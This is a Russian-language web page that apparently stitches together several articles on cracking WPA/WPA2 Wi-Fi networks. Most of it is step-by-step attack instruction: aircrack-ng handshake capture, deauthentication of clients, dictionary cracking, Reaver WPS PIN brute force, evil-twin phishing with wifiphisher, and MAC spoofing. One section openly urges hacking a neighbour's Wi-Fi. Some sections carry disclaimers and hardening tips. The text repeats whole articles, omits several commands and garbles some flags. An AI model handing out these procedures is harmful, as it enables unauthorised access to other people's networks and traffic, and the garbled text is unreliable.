2 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Популярные способы взлома Wi-Fi WPA2

Содержание

Как взломать пароль Wi-Fi WPA2-PSK: взлом WiFi для чайников

Всем примет! Скорее всего вы зашли, чтобы прочесть про взлом WiFi c WPA2-PSK защитой. Начнем, наверное, с самого начала. После создания беспроводной технологии, а уже впоследствии маршрутизаторов, которые могли по воздуху объединять устройства – использовалась технология шифрования AES. Впоследствии её доработали и в свет вышла WPA2-PSK. При это уже внутри стоял более мощный и сложный алгоритм AES.

Но и у него нашлись слабые стороны. Слабая сторона изначально считалась его сильной стороной, а именно в 4 пошаговой аутентификацией. То есть устройство при подключении и при общении с центральным интернет-центром начинает с 1 и заканчивает 4-ым шагом. Вот если поймать и попытаться расшифровать этот пакет данных – то взлом удастся.

Данная статья подготовлена исключительно в целях повышения навыков личной информационной безопасности. Проект WiFiGid категорически против применения информации на чужих сетях без получения предварительного согласия их владельцами. Давайте жить дружно и не вредить другим людям!

Нам понадобится специальный внешний модуль, которые работает из-под операционной системы Kali Linux и поддерживает принцип приёма и передачи пакетов «Backtrack». Подобный модуль работает в режиме «promiscuous mode», то есть он принимает весь трафик, которые витает вокруг вас без разбора.

Вот вам пример – если вокруг вас есть 4 соседских Wi-Fi роутера и все они вечером активно работают и передают информацию. То с этим устройством пакеты будут доходить и до вас. Наша же задача перехватить нужный и расшифровать. Можете использовать модель – Panda 300Mbps Wireless N USB Adapter. Но это всего лишь рекомендация, так что встроенный тоже должен пойти.

Также, как вы, наверное, могли заметить вам нужно установить в качестве второй системы Kali Linux. К сожалению, но все хакерские фишки и фичи находятся внутри этой ОС. Инструкция по установке в интернете уйма и все они понятны, так что идём сначала туда. Уже после этого я расскажу – как узнать пароль от WiFi и взломать Security маршрутизатора.

ВНИМАНИЕ! Взлом сетей на территории некоторых стран запрещен законом. Все нижеперечисленные инструкции были предоставлены в ознакомительных целях, для повышения грамотности. Взлом был произведен на примере собственного роутера и не нёс никаких негативных последствий для окружающих. В процессе написании статьи – ни один соседский роутер не пострадал.

Инструкция по подбору пароля

В качестве перехватчика мы будем использовать программу – «aircrack-ng». Также на забудьте скачать её – перед этим убедитесь, что вай-фай адаптер работает, а на него скачены последние драйвера.

  1. Запускаем терминал и прописываем команду:

airmon-ng start wlan0

  1. Теперь очень внимательно посмотрите в строку «monitor mode enabled on». В конце этой строке будет переименованное название вашего модуля. У меня это mon0, но у вас может быть другое значение. Так что в последующих программах вместо mon0 ставьте название вашего модуля. Прописываем команду:

  1. В команде mon0 — это как раз обозначение вашего адаптера, который был переименован вашей программой. Теперь вы должны увидеть вот такую таблицу всех передаваемых пакетов в данное время. В первом столбце идёт MAC- адрес устройства: то бишь маршрутизатора. Далее идёт мощность передатчика, чем меньше значение, тем ближе он находится. Потом значение Beacons и далее размер пакеты данных. В строке CH – определение канала в частоте 2.4 ГГц. Напомню, что каналов всего 13, но используется 11. MB – скорость передачи. ENC – тип шифрования. CIPHER – стандарт шифрования, который используется. ESSID – имя беспроводной сети.
  2. Теперь нужно выбрать цель для взлома. Нам нужен MAC-адрес — это первый столбец и значение канала (CH).

airodump-ng —bssid *MAC-адрес* c *канал* write *имя файла* mon0

  1. Это маска команды, то есть вместо значений со звездочками вы должны вписать значения:
    1. *MAC-адрес* – BSSID;
    2. *канал* – CH;
    3. *имя файла* – туда куда будет записываться данные, можно обозвать как захотите, но запомните это значения.
  2. Звездочки вписывать не надо. Вот вам пример моей команды:

airodump-ng –bssid 08:86:30:74:22:76 -c 6 –write WPAcrack mon0

  1. Я взял третью позицию на скриншоте выше. Теперь система перехватывает пакеты только от этого роутера. Теперь нужно сделать так, чтобы любое авторизованное устройство с этим роутером было отключено и снова попыталось авторизоваться. Именно на этом этапе мы сможет перехватить пакет и позже его расшифровать. Прописываем команду в новом терминале:

aireplay-ng –deauth 100 -a 08:86:30:74:22:76 mon0

  1. Надеюсь, вы догадались, что MAC-адрес нужно вписывать свой, остальные значение ставьте по умолчанию.

  1. Теперь в первом терминале вы должны увидеть строку «WPA handshake» с кодом. Вот именно этот пакет нам и был нужен.
  2. Открываем ещё один терминал и прописываем команду для взлома этого WPA handshake.

aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de

  1. WPAcrack-01.cap – это именно то имя файла, которое вы вписывали. Сюда надо просто дописать «-01.cap». После «-w» идёт файл, в котором хранится база всех самых известных паролей. «/pentest/passwords/wordlists/darkc0de», а в частности файл darkc0de – это вшитая база паролей в сам «aircrack-ng». Но вы можете потом попробовать скачать и другую базу данных. Их очень много в интернет, некоторые достигают сотни гигабайт.

Теперь нужно просто ждать, пока система перебором найдет нужный пароль от вай-фай сети. Тут все зависит от скорости вашего процессора. Кстати, некоторые в переборе используют именно GPU, а не CPU, так скорость при этом в несколько раз выше. Если ключ будет найден, то вы увидите надпись «KEY FOUND», а рядом будет заветный пароль.

Как взломать Wi-Fi WPA2 — популярные способы взлома

Без интернета жизнь современного человека представить невозможно, чем умело пользуются злоумышленники. Группой IT-разработчиков были выявлены дыры безопасности в WPA2. Как известно, эта технология должна гарантировать полную безопасность соединения для современных защищенных Wi-Fi систем. Это говорит о том, что злоумышленники, находясь в зоне действия беспроводной сети, способны обойти защиту и завладеть трафиком и беспроводным устройством в целом. Все атаки, направленные против WPA2, получили обобщенное название — KRACK.

Уязвимость в протоколе WPA2

Прежде чем выяснить, как взломать Вай Фай WPA2, нужно ознакомиться с общими сведениями об уязвимости протокола.

Как только устанавливается соединение между клиентом и точкой доступа, налаживается трафик согласования для стандарта WPA2. При атаке системы злоумышленниками между точкой доступа и пользователем нарушается порядок приема и обратной передачи данных, что позволяет брать под контроль передачу сообщений и манипулировать синхронизацией.

Возможность взлома

Взлом Wi-Fi WPA2 PSK возможен, и для этого вовсе не обязательно быть крутым программистом. Дело в том, что у системы есть большая слабость — четырехступенчатая система рукопожатий. Существует несколько алгоритмов, которые злоумышленникам позволяют полностью или частично завладеть трафиком.

Популярные способы взлома

Протокол WPA2, несмотря на недочеты, считается самым надежным стандартом. К основным прорехам принято относить ошибки, которые пользователь допустил при настройке удаленной точки доступа. К основным из них относят:

  • Уязвимый WPS;
  • Подбор пароля;
  • Взлом протокола через поддельную точку доступа.

Каждый способ взлома стоит рассмотреть более детально.

Уязвимый WPS

Технология Protected Setup — это самая большая «дыра» в системе безопасности беспроводных сетей. Обусловлено это ее уязвимостью к воздействиям извне. Именно поэтому необходимо первым делом перед эксплуатацией отключить WPS на роутере. Для этого нужно выполнить следующие манипуляции:

  1. Зайти в раздел «Настройки» маршрутизатора (192.168.0.1 или 192.168.1.1), открыть параметры беспроводной сети.
  2. На экране отобразится отдельная кнопка под названием «Отключить WPS», она деактивирует функцию.

Обратите внимание! Если специфика работы не позволяет обойтись без этого функционала, то в качестве альтернативы достаточно просто отключить PIN-код, поставив галочку напротив соответствующей надписи.

Подбор пароля Wi-Fi

На подбор WiFi пароля WPA2 PSK Windows может уйти немалое количество времени, все зависит от сложности комбинации. В качестве перехватчика преимущественно используется программа «aircrack-ng». Последовательность действий следующая:

  1. Прежде всего, нужно запустить терминал и прописать в нем следующую команду «аirmоn-ng stаrt wlаn0».
  2. Следующий этап — внимательно ознакомиться со строкой «mоnitоr mоdе еnаbled оn». В конце этой строки должно быть переименованное название модуля владельца, например mоn0. Прописывается следующая команда: «аirоdump-ng mоn0».
  3. Mon0 в строке обозначает конкретный адаптер, который был переименован программой.
Читать еще:  Windows Performance Station — оптимизатор системы для компьютерных игр, работающий на базе нейросетей

В завершении нужно указать свой MAC-адрес и ждать, пока система не подберет нужную комбинацию пароля. Скорость взлома напрямую зависит от мощности и скорости процессора злоумышленников. Большинство из них используют в переборе не CPU, а GPU, поскольку скорость работы значительно выше. По окончании работы на экране монитора отобразится надпись «KEY FOUND», а напротив будет отображен пароль.

Важно: пароль, который состоит из 8 и более произвольных символов подобрать достаточно сложно, и уходит на это большое количество времени. Поэтому специалисты пользователям настоятельно рекомендуют устанавливать пароль, содержащий большое количество букв разных регистров, также символы и цифры. Оптимальное количество символов 10-12. Для взлома такого пароля могут уйти не то что месяцы, но и годы.

Взлом WPA2 через поддельную точку доступа

Этот способ используют люди, имеющие определенный багаж знаний в этой отрасли, поскольку реализация наиболее сложная. Суть метода состоит в том, чтобы создать искусственную точку доступа FakeAp, которая полностью копирует жертву. Как только поддельная точка готова, в эфир подается сигнал на отключение гаджета от точки доступа, следовательно, клиенты переподключаются.

В завершении злоумышленникам лишь остается извлечь данные аутентификации и пароль, какой бы сложной комбинация цифр и символов ни была.

Суть атаки KRACK

Основываются все атаки, входящие в группу KRACK, на выведение из строя четырехэтапного рукопожатия протокола. Завладение трафиком происходит в то время, когда пользователь подключается к защищенной беспроводной сети и использует правильные данные (логин и пароль) для аутентификации.

Обратите внимание: система четырехэтапного рукопожатия применяется для генерации шифровального ключа, который используется для шифрования трафика за сеанс.

Как только происходит перестановка шифровального ключа, такие параметры, как номер принимаемого пакеты и номер передаваемого пакета сбрасывают свои параметры к заводским (изначальным) настройкам.

Говоря о последствиях взлома WPA2, стоит отметить, что злоумышленники способы внести в систему вредоносные программы, которые отрицательно скажутся на работоспособности системы. В некоторых случаях возможна кража паролей от социальных сетей, банковских карт.

Как защититься от уязвимости KRACK

Разработчиками были выделены общие рекомендации, выполнение которых позволит защититься от нападок злоумышленников. Итак:

  • Не использовать 802.11r, эта функция носит название — быстрый роуминг.
  • Немедля обновить портативный и стационарный компьютер, смартфон, планшеты и т.д., оснащенные беспроводным Wi-Fi модулем до прошивки или версии операционной системы, которая защищена от атак KRACK.

Важно знать, что смена пароля к точке доступа никак не влияет на взлом WPA2 Wi-Fi, к сожалению, уязвимости не устраняются.

Взломать Wi-Fi WPA возможно несколькими способами, достаточно руководствоваться разными алгоритмами, в зависимости от выбранного способа. Для защиты же сети необходимо обновить свои устройства до версий прошивки, которая защищена от атак.

Как настроить?

Всё о Интернете, сетях, компьютерах, Windows, iOS и Android

Можно ли взломать WiFi WPA2 и как это делают?!

В этой небольшой статье я хочу подробно рассказать про существующие способы взломать WPA2 — самый надёжный стандарт защиты WiFi. Дело в том, что зачастую пользователи, начитавшись инструкций в Интернете, ставят этот стандарт в настройках роутера и всё. То есть ничего кроме этого не делают и надеются, что их не взломает школьник, живущий по соседству. Но не тут-то было! Безопасность беспроводной сети можно обеспечить, только используя комплекс мер разом. Использование лишь одной из мер по отдельности не даст результата!

Популярные способы взлома Wi-Fi WPA2

Так как же можно взломать Wi-Fi WPA2 — он же считается надёжным?! Или это не так?! На самом деле так — это действительно надёжный стандарт, а все прорехи в нём — это фактически ошибки, допущенные пользователями при настройке. Давайте пробежимся по ним.

1. Уязвимый WPS

Технология Wi-Fi Protected Setup — это самая-самая распространённая брешь в безопасности беспроводной сети. Сама то она хорошая, но из-за имеющихся критических уязвимостей представляет реальную угрозу. Именно поэтому обязательно первым делом надо отключить WPS на роутере . Сделать это очень просто. Заходим в настройки маршрутизатора (192.168.1.1 либо 192.168.0.1) и открываем параметры беспроводной сети. На некоторых моделях, как на моём TP-Link’е, управлением функционалом Wi-Fi Protected Setup выведено в отдельный раздел веб-интерфейса.

Там будет отдельная кнопка «Отключить WPS», нажатие которой деактивирует опцию.

Если же WPS вам ужас как нужна для облегчения подключения клиентских устройств, то просто отключите PIN-код, поставив соответствующую галочку в параметрах:

2. Подбор пароля WiFi

Второй по популярности способ взломать WPA2 — это перебор ключей, то есть так называемый «Brute Force». Злоумышленник запускает специальную программу, которая перебирает различные пароли по словарям, пытаясь найти правильную комбинацию. Сложный пароль, состоящий из произвольных символов длиной от 8 знаков подобрать достаточно сложно и долго. Хулиганы же играют на лени и глупости тех, кто настраивал точку доступа и оставил заводской пароль, либо поставил свой, но очень-очень лёгкий.

Вывод — всегда делайте сложный пароль на Вай-Фай. Обязательно он должен содержать цифры, обязательно должен содержать буквы разных регистров и не короче 8 символов. Лучше всего 10-12 символов. В этом случае на перебор пароля уйдёт дикое количество времени (годы).

3. Взлом WPA2 через поддельную точку доступа

Этот способ не используют хулиганы и школьники, так как он более сложный и требует уже определённых технических знаний. Смысл его в том, что злоумышленник использует поддельную точку доступа FakeAP, копирующую жертву. Потом отправляет в эфир своеобразный сигнал на отключение устройства от точки доступа, чтобы клиенты переподключились. Далее остаётся только поймать данные аутентификации, которые пришлёт обманутый гаджет, в затем вычленить из них пароль, каким бы надёжным он не был.

Способ защиты в этом случае заключается в использовании привязки клиентских устройств по MAC-адресу. Таким образом Вы сможете контролировать те девайсы, которым можно подключаться и отбрасывать все остальные.

Как взломать Wi-Fi сеть с WPA шифрованием

Совсем недавно мы публиковали памятку о том, почему не стоит использовать WEP шифрование для своей Wi-Fi точки доступа. Несмотря на наличие осуждающих комментариев в стиле «нельзя учить людей ломать сети» мы ещё раз напоминаем, что знание и способ его применения — довольно разные вещи. Естественно, применять такое на чьём-то чужом роутере ни в коем случае нельзя. Данный материал не включает многие уточнения по осуществлению взлома и несёт только показательный смысл. Он призывает не ломать сети, а правильно настраивать роутер для того, чтобы его не поломали.

Многие из нас охотно верят в тот факт, что WPA шифрование является пуленепробиваемым для любых видов атак, однако, производители многих роутеров до сих по непонятным причинам делают активной функцию WPS с аутентификацией по PIN коду. Дело в том, что этот 8-изначный PIN строится по такому алгоритму, что злоумышленнику достаточно подобрать лишь 7 первых знаков из этого кода, причём первые 4 и последние 3 подбираются отдельно, что в итоге даёт всего 11000 максимально возможных вариантов кода. На практике подбирается он довольно просто.

Для взлома Wi-Fi сети с включенным WPS злоумышленнику понадобится:

  • BackTrack 5 Live CD
  • компьютер с Wi-Fi адаптером и DVD-приводом
  • ваша Wi-Fi сеть с WPA шифрованием и включенным WPS
  • некоторое терпение

Начиная с R2 версии BackTrack 5 включает в себя утилиту под названием Reaver, которая использует уязвимость WPS. Для взлома необходимо собрать некоторую информацию, в частности, имя интерфейса вашей беспроводной карты и BSSID роутера-жертвы. Также необходимо перевести Wi-Fi карту в режим монитора.

В терминале вводим команду:

Нажимаем Enter. Если у вас одна беспроводная карта, то, скорее всего, она будет называться wlan0. В любом случае, в дальнейшем достаточно заменять wlan0 на ваш вариант, и всё будет работать.

Переводим карту в режим монитора:

airmon-ng start wlan0

Среди прочей информации вам необходимо запомнить имя интерфейса режима монитора, в данном случае это mon0.

Узнаём BSSID роутера-жертвы:

Если не помогло, то пробуем:

Когда в появившемся списке обнаружится нужная сеть, можно нажать Ctrl + C для остановки обновления списка. Копируем BSSID и приступаем к самому занимательному. В терминале вводим:

reaver -i moninterface -b bssid -vv

moninterface — имя интерфейса режима монитора, bssid — BSSID роутера-жертвы

Процесс пошёл. Можно пить чай, играть с котом и делать прочие интересные вещи. Утилите может потребоваться до 10 часов для подбора PIN. В случае успеха вы получите PIN и пароль к точке доступа.

Защита

Для того, чтобы защититься от этой штуки, нужно отключать WPS (в некоторых моделях может называться QSS) в настройках роутера. Не лишним будет и установка MAC фильтрации, благодаря которой левые устройства вообще не смогут подключиться к сети (однако, и здесь не исключен вариант, при котором злоумышленник получит доступ к списку разрешённых MAC адресов и подделает свой адрес).

Популярные способы взлома Wi-Fi WPA2

Привет, сегодня я расскажу вам о взломе Wi-Fi сети с аутентификацией WPA/WPA2. Для проведения тестирования на проникновения беспроводных сетей отлично подойдет дистрибутив kali linux, содержащий большое количество утилит.

Читать еще:  Способ 1. Автоматическое подключение VPN через Планировщик заданий.

Для начала мы проверим доступные сетевые интерфейсы. Сделать это можно командой:

При этом вы увидите похожую картинку:

В данном случае есть 2 доступных сетевых интерфейса, wlan0mon (о режиме мониторинга чуть позже) и wlan1 (wlan0).

После это шага есть несколько возможных путей:

  • Путь попроще и для ленивых: использовать утилиту wifite
  • Делать все ручками и сами

В первом случае вам потребуется всего лишь

-выбрать девайc с которого проводить атаку (сетевой интерфейс)

-выбрать атакуемую сеть

-далее утилита все сделает сама: либо захватит хендшейк если вы атакуете WPA сеть без WPS, либо будет производить атаку с помощью Pixie если WPS включен.

-на случай WPA, Wifite можно запустить указав словарь который он будет использовать для взлома хендшейка (wifite –dict wordlist.txt).

Когда мы убедились, что вайфай адаптер подключен и работает, нужно узнать сигнал каких сетей он ловит, один из вариантов, включить беспроводной интерфейс и произвести сканирование.

Для этого мы воспользуемся следующими командами:

ifconfig wlan1 up – в данном случае wlan1 это имя сетевого интерфейса

iwlist wlan1 scanning – сканирование с использованием интерфейса wlan1

и мы получим приблизительно такой вывод:

Нас интересует сразу несколько параметров:

Имя сети, MAC адрес, канал

Теперь давайте попробуем захватить хендшейк, для этого нам надо перевести сетевой интерфейс в режим мониторинга и захватить хендшейк.

Для перевода в режим мониторинга используется команда :

airmon-ng start wlan1 – при этом интерфейс поменяет имя на wlan1mon и перейдет в режим мониторинга (проверить это можно при помощи iwconfig), при этом вас может предупредить о том, что какие-то процессы могут этому мешать, не обращайте внимания, это нормально.

Для более аккуратного захвата хендшейка мы будем использовать информацию, которую мы получили при сканировании:

Airodump-ng wlan0mon –-bssid FC:8B:97:57:97:A9 –-channel 2 -–write handshake –-wps

wlan0mon – имя интерфейса

bssid FC:8B:97:57:97:A9 – MAC адресс роутера который мы взламываем

channel 2 – ограничение по каналу, на роутер который мы взламываем

write handshake – эта команда позволяет нам записать захваченную информацию в файлы с именем handshake

wps – отобразит наличие WPS у точки на случай если вы его упустили.

Вот так выглядит процесс захвата хендшейка.

Учитывая, что хендшейк происходит при подключении клиента к точке доступа, то нам необходимо либо подождать пока клиент подключиться к точке доступа (например придя домой, в офис, или включив ноутбук/wifi) либо помочь клиенту пере подключиться к точке доступа используя деаунтефикацию и поимку хендшейка при последующем подключении. Пример деаунтефикации.

aireplay-ng -0 10 –a FC:8B:97:57:97:A9 –c 68:3E:34:15:39:9E wlan0mon

-0 — означает деаунтефикацию

10 – количество деаунтефикаций

-a FC:8B:97:57:97:A9 – MAC адрес точки доступа

–c 68:3E:34:15:39:9E – MAC адрес клиента

wlan0mon – используемый интерфейс

Когда вы поймаете хендшейк это отобразиться в правом верхнем углу.

Теперь, когда мы поймали хендшейк желательно его проверить, почистить убрав все лишнее и подобрать пароль.

Проверить можно несколькими способами:

1) с помощью утилиты cowpatty

cowpatty -r handshake-01.cap -c

-r указывает файл для проверки

-с указывает что нам надо проверить хендшейк а не взламывать его

Как мы видим на скриншоте в первом файле у нас не было правильно хендшейка, зато во втором был.

2) С помощью Wireshark

для этого надо открыть файл wireshark’om, это можно сделать как из терминала (wireshark handshake-01.cap) так и в ручную. При этом вы увидите большое количество пакетов. Давайте отфильтруем пакеты хендшейка с помощью фильтра:

eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08

теперь нам требуется оставить броадкаст точки доступа, и первые 2 пакета хендшейка, убрав все остальное. При этом надо следить чтобы у первых 2х пакетов номер не слишком отличались, чтобы они были из одного хендшейка.

При этом можно выделить броадскаст и 2 первых пакета и сохранить их отдельно.

3) самый простой способ — это утилита WPAclean.

wpaclean handshake-01.cap wpacleaned.cap

handshake-01.cap — это файл источник из которого будет браться хендшейк

wpacleaned.cap — это файл куда будет записываться очищеный хендшейк.

Как мы видим вывод программы несколько разный, это связанно с тем что в первом файле не было всей необходимой информации.

Теперь, когда у нас есть правильный очищенный хендшейк, нам остается его расшифровать.

Для получения пароля от Wi-Fi нам потребуется найти пароль, при использовании которого хеши для 2х наших хендшейков совпадут. Для этого можно использовать словарь или подбирать по символам. Если у вас не суперкомпьютер, то этот вариант вам вряд ли подойдет, так как количество вариантов — это количество допустимых символов в степени количества знаков пароля (

130^8 для 8 значного пароля). Применять подбор по символам имеет смысл, если вы знаете кусочек пароля, который сократит количество вариантов, или ограничение пароля (например, что там только цифры, или он совпадает с мобильным телефоном в вашей области). Сейчас мы будем подбирать пароль по словарю.

Мы можем расшифровывать хендшейк при помощи CPU или GPU. Обычно, если у вас мощная видеокарта, то при помощи GPU быстрее.

Для расшифровки с помощью CPU мы воспользуемся aircrack

aircrack-ng wpacleaned.cap –w wordlist.txt

wpacleaned – это наш очищенный и проверенный хендшейк

-w wordlist.txt – это наш словарь, по которому мы и будем подбирать пароль

Если пароль будет в словаре, то через некоторое время подбора вы увидите соответствующее сообщение:

В котором будет указан ваш пароль. Или же сообщение о том, что словарь закончился, а пароль так и не найден.

Утилита для взлома через GPU называется pyrit обладает гораздо большими возможностями и тонкой настройкой, но о них как-нибудь в следующий раз, сейчас мы просто попробуем подобрать пароль для хендшейка с нашим конкретным словарем.

pyrit –r wpacleaned.cap –i wordlist.txt attack_passthrough

-r wpaclean.cap – файл хендшейка

-I wordlist.txt – файл словаря

Если это не помогло:

Можно попытаться применить смесь социальной инженерии и атаки на Wi-Fi, для этого есть 2 утилиты:

Для wifiphisher нам понадобиться 2 вайфай адаптера. Вкратце это происходит так:

  • С помощью 1 адаптера мы глушим точки цели
  • На втором адаптере мы поднимаем открытую точку с таким же именем
  • Когда цель не сможет подключиться и использовать свою точку, она возможно подключится к нашей
  • У цели выпадет «похожее» на правдивое окошко где попросят ввести пароль от вайфая для того чтобы роутер закончил обновление.

При этом правильность введенного пароля для обновления не проверяется.

Linset осуществляет работу подобным образом. Но ключевая особенность этой утилиты, в том, что она на испанском,

Английской и тем более русской версии нету, к сожалению у меня она не запустилась

Как взломать соседский WiFi, все возможные методы в одной статье

В сегодняшней статье давайте затронем щекотливую тему: как взломать сеть вай фай. Кто-то спросит, а разве это законно? Конечно же, нет, это считается серьезным правонарушением, поэтому если кто решил это сделать, делает это на свой страх и риск. Конечно, у каждого такое может случиться, когда деньги на счету закончились, и интернет вам отключили. И в этот именно момент появились форс-мажорные обстоятельства, когда срочно нужен доступ в интернет. Ну и что остается делать? Правильно, воспользоваться соседским Wi Fi интернетом. Вариант первый, попросим у него пароль от вайфай сети, вариант второй, взломаем его WiFi сеть. А как это сделать мы расскажем ниже в статье.

Сеть без шифрования

Разумеется, что есть не жадные люди, которые не ставят пароль на WiFi сеть. Или пользователь при настройке роутера забыл его поставить. В таком случаи не сложно будет подключиться к этой сети. Достаточно просто просканировать радиоэфир на вашем устройстве, найдя сеть которая не защищена клацаем на ней и подключаемся. В таких случаях вопрос как взломать сеть WiFi отпадает сам собой.

Подбираем пароль Wi Fi сети вручную

Ищем WiFi у которого наиболее высокий уровень сигнала. Предпочтение отдается соседской сети или той сети, которой вы знаете хозяина. В дальнейшем вы поймете, почему так.
Очень часто неопытные пользователи ставят пароль, не задумываясь о сложности набранного пароля. И вся их фантазия заканчивается на дате рождения, имя домашнего питомца, фамилии. Зная соседа (хозяина) Wi-Fi, вам не составит труда подобрать ключ.
Если не получилось с подбором личной информацией соседа, переходим к следующему варианту, который очень популярный среди пользователей. Это, самые распространенные пароли, мы приведем их ниже в таблице.

Один из плюсов этого метода заключается в его простоте, но есть и минусы, один из них это время, которое необходимо потратить на этот способ. Особенно если сосед поставил в настройках роутера ограничения на ввод пароля и логина, тогда после неудачных 3 попыток следующие попытки можно будет делать только на следующий день.

Взламываем при помощи изменения MAC address

Некоторые умельцы предпочитают ставить фильтрацию по MAC адресу (MAC address – это уникальный идентификатор который есть у каждого устройства) вместо пароля. При сканировании вы увидите сеть, к которой якобы можно без проблем подключится, но при попытке у вас ничего не получится. Значит, стоит фильтрация, которую вам необходимо обойти.

Вам необходимо выяснить, какие MAC адреса разрешены для подключения. Здесь вам в помощь придут программы, которые умеют сканировать, к примеру, Airodump-NG , MAC Address Scanner .

Читать еще:  Мошеннические схемы обмана пользователей Интернета: возвращаясь к актуальной теме » Как установить Windows 10

Узнав MAC адреса можно приступать к замене на компьютере своего MAC адреса.

Заходим в « Пуск », « Панель управления » находим « Центр управления сетями и общим доступом » с левой стороны сверху ищем строку « Изменение параметров сетевого адаптера ».

Выбираем активное сетевое подключение, клацаем на нем правой кнопкой мыши и нажимаем на строке « Свойства ». В окне, которое выскочило, находим вкладку « Сеть » и жмем на кнопку « Настроить ». Активируем сетевой адрес и вводим новый MAC.

Для замены MAC Address на Windows 10 есть очень удобная утилита Technitium MAC Address Changer с помощью, которой вы быстро это сделаете. Дальше рекомендуется перезагрузить ПК. Готово, вот мы и выяснили как можно взломать Wi Fi благодаря подмене MAC address.

Взлом WiFi пароля при помощи программ

В данном сегменте программ для взлома много, но мы поговорим о наиболее популярных.

Взломщик Aircrack-ng

Хорошие отзывы от пользователей имеет утилита Aircrack-ng. Это большой набор инструментов, в который входит: airodump, aireplay, aircrack, airdecap.

  • Скачиваем и распаковываем. Заходим в папку « Bin » запускаем файл Aircrack-ng GUI .
  • Во вкладке « Filenames » нужно выбрать дамп который будет перехватывать пакеты и ключи. К примеру, можно взять утилиту CommView for WiFi для этих целей.
  • Назначаем тип шифрования, которым вайфай сеть защищена: либо WEP , либо WPA Для варианта WEP необходимо назначить длину ключа и сделать отмену в пункте « USE PTW attack ». Для варианта WPA достаточно только определится со словарем для подбора пароля.
  • Последнее действие, которое нужно сделать, это нажать на кнопку « Launch ». Весь процесс перебора занимает 2-5 минут.

Метод Brute force

Суть брутфорса заключается в полном автоматизированном подборе всех возможных вариантов пароля. Этот метод подходит для продвинутых пользователей, обычному юзеру будет крайне сложно. Такие хакерские методы часто используют для взлома платежных систем, онлайн-банков, учетных записей.

Если вы решились попробовать Brute force, имейте виду, характеристики ПК играют большую роль, если компьютер слабый, программа может делать анализ несколько дней.

На текущий момент существует несколько вариантов «полного перебора»:

  1. Персональный взлом. Это когда взламывают почту, аккаунт, сайт.
  2. Брут-чек. Здесь ведется охота по-крупному, 1-2 пароля некому ненужные, интересует большое количество паролей от каких нибудь крупных ресурсов.
  3. Взлом компьютерного устройства произведенного удаленно.

С Brute force хорошо сочетаются приложения: Brutus AET , All-in-One Checker , Appnimi Password Unlocker .

Взломщики для Windows — AirSlax, Wi-FI Sidejacking, CommView for WiFi, Dumpper

  1. AirSlax – утилита, которая ловит пакеты в сети вай фай, в дальнейшем они необходимы для подбора пароля. Подбирает password с шифрованием WPA, WPA2, WEP, а также пин-код по WPS.
  2. Wi-FI Sidejacking — этот взломщик полностью бесплатный, мало настроек, утилита представлена на русском языке, поддерживаем мобильные устройства.
  3. CommView for WiFi – подходит для любой ОС Windows, утилита делает захват и анализ сетевых пакетов. Русский язык присутствует.
  4. Dumpper – эта утилита на маршрутизаторе взламываем ее PIN код. Запускаем сканер. Через минуту вы будете знать обо всех компьютерах на расстоянии пару метров. Этот PIN необходим будет для некоторых утилит, которые помогут взломать вам пароль WiFi.

Взлом пароля через Pin код оборудования

Чтобы узнать password через Pin код устройства, на котором стоит шифрование WPA, WPA2 вам понадобится:

  1. Ноутбук или компьютер, если у вас компьютер тогда необходимо, чтобы на нем был вайфай-адаптер.
  2. USB-флеш-накопитель минимум на 2 Гб
  3. Программа «Elcomsoft Wireless Security Auditor».

Рекомендуем работать в ОС Linux, так как все процедуры выполнить намного легче. Если такой возможности нет, все получится и в Виндовсе.

  • Форматируем флешку и скачиваем на неё утилиту « WiFi Slax ». Запускаем программу на флешки нажатием на « Wifislax Boot Installer ». Указываем параметр S и клацаем « Ввод »
  • Перезагружаем и делаем запуск с нашей флешки.
  • Выбрать запуск с ядра SMP , а wifislax c KDE , ждем загрузку.
  • Заменяем MAC лэптопа, сделав в консоли « ifconfig wlan0 down ».
  • Открываем « Macchanger », нажимаем « Поменять MAC ».
  • Выходим из утилиты и в консоли выполнить « ifconfig wlan0 down ».
  • Запускаем « minidwep-gtk », нажимаем « Сканировать » и ожидаем. Технологию WPS намного легче можно взломать, поэтому для новичков рекомендуем её.
  • После сканирования выбираем жертву и нажимаем « Reaver ». Все, ожидаем взломанный пароль Wi Fi

Есть более легкий способ узнать Pin, просто прогуляйтесь в гости к вашему соседу. Когда он отойдет, возьмите роутер и переверните, там вы и увидите WPS Pin .

Утилита c миллионом паролей wi-fi

Есть другой метод взломать чужой вай фай, для этого необходимо просто скачать утилиту, благодаря которой, вам не понадобится ничего взламывать, нужно будет просто подобрать ближайшую точку с интернетом.

Wi-fi map — Подходит для любого гаджета. Идея приложения заключается в обмене вай фай паролями по всему миру. Утилита выдаст на вашем гаджете пароли к ближайшим интернет wi fi сетям, но только при условии если кто-то раньше подключался здесь и внес в Wi-fi map пароль, логин.

WiFi You – В этом приложении уже около 20 миллионов точек доступа по всему миру.

Swift WiFi – Похожая утилита на Wi-fi map, принцип тот же. Установите приложение, и ваш гаджет автоматически выполнит подключение к ближайшей беспроводной сети которая есть в базе программы.

Взламываем пароль с вашего смартфона

WPS Connect – главная цель этой программы определить, насколько роутер, который использует установленный Pin код по умолчанию, уязвим от взлома вай фая. Для использования этой утилиты необходимо чтобы устройство было рутованным.

WIBR+ — отлично подходит для телефонов на Андроиде. Программа умеет одновременно выполнять несколько действий по подбору пароля к двум сетям сразу.

  1. Скачиваем и устанавливаем.
  2. Нажимаем на пункт « Add Network » и добавляем сеть, с самым хорошим сигналом.
  3. Расставляем галочки в настройках, которые нужны.
  4. Жмем на Add to Queue . Готово, утилита начнет свою работу.

Есть небольшой минус у этого приложения, после генерации каждого ключа ему необходимо заново подключаться к сети.

WiHack mobile – это приложение подходит как для Виндовса, так и для Андроида. Чтобы взломать пароль вай фай она использует два варианта которые пользователь может выбирать: брутфорс (простой перебор) или значительно эффективнее вариант анализа пакетов. Устанавливать лучше полную версию.

Утилита взломщик для iPhone

Для iPhone есть утилита под названием Aircrack , работает она методом перехвата. Сложностей в работе с ней не будет, простая и автоматизированная.

  1. Скачиваем, устанавливаем и запускаем.
  2. Сканируем, выбираем из списка сеть которую будете взламывать.
  3. Ожидаем немного, готово.

Вай фай рыбалка (фишинг)

Этот метод обмана ради получения пароля используют нечасто. Суть заключается в посещении фишинговой страницы (страница двойник), пользователь, зайдя на эту страницу, ведет свой password и login. Так легко и просто взломщик узнает ваши данные.
